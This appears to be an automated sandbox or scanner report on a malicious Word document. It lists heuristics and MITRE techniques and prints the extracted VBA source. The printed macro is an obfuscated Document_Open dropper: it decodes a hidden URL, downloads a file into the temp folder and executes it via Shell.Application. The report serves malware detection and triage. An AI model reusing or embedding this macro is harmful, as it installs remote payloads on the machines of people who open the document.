MALICIOUS
Risk Score: 172
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. A critical heuristic indicates that the VBA code downloads a file from an HTTP URL and executes it. A Document_Open macro is present and CreateObject is called, suggesting the execution of arbitrary code. The specific URL referenced by the macro, http://schemas.openxmlformats.org/drawingml/2006/main, is benign, but the heuristic strongly suggests download-and-execute behavior, indicating downloader or dropper functionality.
Heuristics: 7
- VBA macros detected (medium, 4 related findings), OLE_VBA_MACROS: Document contains VBA macro code.
- VBA downloads and writes a file to disk (critical), OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script:
  UKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEIDSPQPRKNRZNMUPQMYNDCTNXSOUZRRLLYDJXHWJRXRQNWVHYEHFLTTEFKVMBJYCMPKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRB = PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.responseBody
- CreateObject call (high), OLE_VBA_CREATEOBJ: CreateObject call.
  Matched line in script:
  Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
- VBA p-code auto-exec with execution tokens (high), OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low), OLE_VBA_DOCOPEN: Document_Open macro.
  Matched line in script:
  Private Sub Document_Open()
- Suspicious extracted artifact (info), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (Referenced by macro)
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15748 bytes |

SHA-256: 17cf29051822b23f8fba9b946384df799bca817e50281b0bf5098a61d259e52d
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 75 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function CleanEncryptSTR(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL As String) As String
Dim NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP As String
NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP = "&0123456789;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
Dim OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN As String
Dim QUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUH As Boolean
OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN = "DFHSGFJHSHFBDFBDFGSDRBRHBESRBERGSERHRHESDRGRFDBSDRGEARGHERGHESRHERGESRGESRHEHRFGBHSRGHESDRHERHBDRFGBHSDFGESRGHEWSRGHSGBESRGHESRHAREGERGASGHESRHESRHESRHERGESRGSERGASGEARGAREGHEHEAHRSE"
QUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUH = False
Dim i As Integer
Dim KINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMG As Integer
Dim GTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELX As String
Dim QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR As Integer
Dim ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG As Integer
Dim VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY As String
If Len(OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN) > 0 Then
For i = 1 To Len(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL)
GTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELX = Mid(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL, i, 1)
QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR = InStr(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP, GTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELX)
If QEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVR > 0 Then
KINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMG = Asc(Mid(OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN, i Mod Len(OYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDN) + 1, 1))
If QUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUH Then
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
Else
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
End If
ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG = ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG Mod Len(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP)
If ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG <= 0 Then
ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG = ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG + Len(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP)
End If
VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY = VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY & Mid(NOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDGVJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCP, ELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBYNOFIRVQGEEDGXCFNBBIDFBNCRQHBLHCJOFFYYMQWLUKWGLGECKJUMRUSYHHSSXJZOWNQZEYOMMLNGDG, 1)
Else
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
End If
Next i
Else
VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY = TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL
End If
CleanEncryptSTR = VJCKLNJVKYRPJTOKRWNNHZOYFMDMFHTOMJSRDNZDBHIPBBGLIWFOYIFZPUUTVOLOEKKRTVRELHZQRCQSZFPVPIVHHULUNPCPURBZLVIECIQXJDHTQFGWGJNIXCDCEPTWMSSZCDYMTPIYZKYBIGXEQQEJPDNDOXKXDZJBMEJMKQYGKLPBY
End Function
Private Sub Document_Open()
Const TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL = 2
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
BBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVS = fso.GetSpecialFolder(TSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVL)
Dim HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI
Set HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI = CreateObject("ADODB.STREAM")
TGUKJZUFZUCHYYSSGKQEOEPYFYXUECNFLNMRZBLMQDTIPGJSWRHFFEHZVZOCUDFGCODSKIDMIDKPHHZTHSYGWFXZNHGDMKVHSVTZCJTUYEBQXHRBXSJNNMPIEIWDDLNOKWEBSJKUJLSXIOICPBZOFNGIVIOLUSEPBXVBKRCVBMJYYPZCGBQVVUXJM = BBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJPUMMGGTXESCREMSMLIRQCTYCZFOOYZFQHVETWGKFVS + CleanEncryptSTR("\enVeeX.m2g")
Set PUMMGYMXELCKDFSMLIRPBMYBZFHOYZEJHVDMWGDXOSSRUNJNCJIQSTPCJGXOQZOQXDNUNHUGFTKSLNBNTQZXJUGDBGPWHBGROEFUFHLGWBBZDORVKQQYBCXKROGWXIWYGEVCPPDHNCLBNVJVCYIYKDILJOWFIJOZWMMDGPTOECCCEWZELYYHC = CreateObject("SHELL.APPLICATION")
Set PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID = CreateObject("MICROSOFT.XMLHTTP")
PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.Open "get", CleanEncryptSTR("n0Awy://&3pixi1lpArwu9.et.40//m0qw/oE0cJd78z4rGpSy.fDl"), False
OHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJP = 1
PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.send
UKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEIDSPQPRKNRZNMUPQMYNDCTNXSOUZRRLLYDJXHWJRXRQNWVHYEHFLTTEFKVMBJYCMPKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRB = PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.responseBody
If PKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRBKTRMCGHGIBXBQWVEGHDPXTLDEOCFLQBICUITSHXGZCOCHENLWIUQOUDKUOTFDRSISVZUKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEID.Status = 200 Then
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Open
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Type = OHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQITLQTRXGNQRWIGUVLOYCWNKLKMFIMUIHPKLHTIXWNISNJP
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Write UKOOOQCFJXFEMOPLXGCTLMWKNTSJQDDQUBPYOBJWKPMVNYQVYWDLSWWCNLZBQTEIDSPQPRKNRZNMUPQMYNDCTNXSOUZRRLLYDJXHWJRXRQNWVHYEHFLTTEFKVMBJYCMPKBXYXZSPSIVOVXYUHVLEBVGBWDIZZTMZLRYPXRTGZYVFEPZMPNSUCMNSWUJRB
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.SaveToFile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
HVETWGKFVSTSUNKNDPIQSTPCQGXVQBVRXDUUOHUGMTKSMOBUTQZXJUHKINPWHINRPELUFOMHWBBBDVRVLRQYBCXKSOGXYJWZGLVDWPDONCSBTVJWCYIGRDPLJPXFPJOZXMNDNQUPFJJJLWZESZYHJKGSZWOGHRFHOMELXXLPVKTJVEREKHQI.Close
End If
PUMMGYMXELCKDFSMLIRPBMYBZFHOYZEJHVDMWGDXOSSRUNJNCJIQSTPCJGXOQZOQXDNUNHUGFTKSLNBNTQZXJUGDBGPWHBGROEFUFHLGWBBZDORVKQQYBCXKROGWXIWYGEVCPPDHNCLBNVJVCYIYKDILJOWFIJOZWMMDGPTOECCCEWZELYYHC.Open (TGUKJZUFZUCHYYSSGKQEOEPYFYXUECNFLNMRZBLMQDTIPGJSWRHFFEHZVZOCUDFGCODSKIDMIDKPHHZTHSYGWFXZNHGDMKVHSVTZCJTUYEBQXHRBXSJNNMPIEIWDDLNOKWEBSJKUJLSXIOICPBZOFNGIVIOLUSEPBXVBKRCVBMJYYPZCGBQVVUXJM)
End Sub
Attribute VB_Name = "NewMacros"
Sub macro()
'
' macro Macro
'
'
End Sub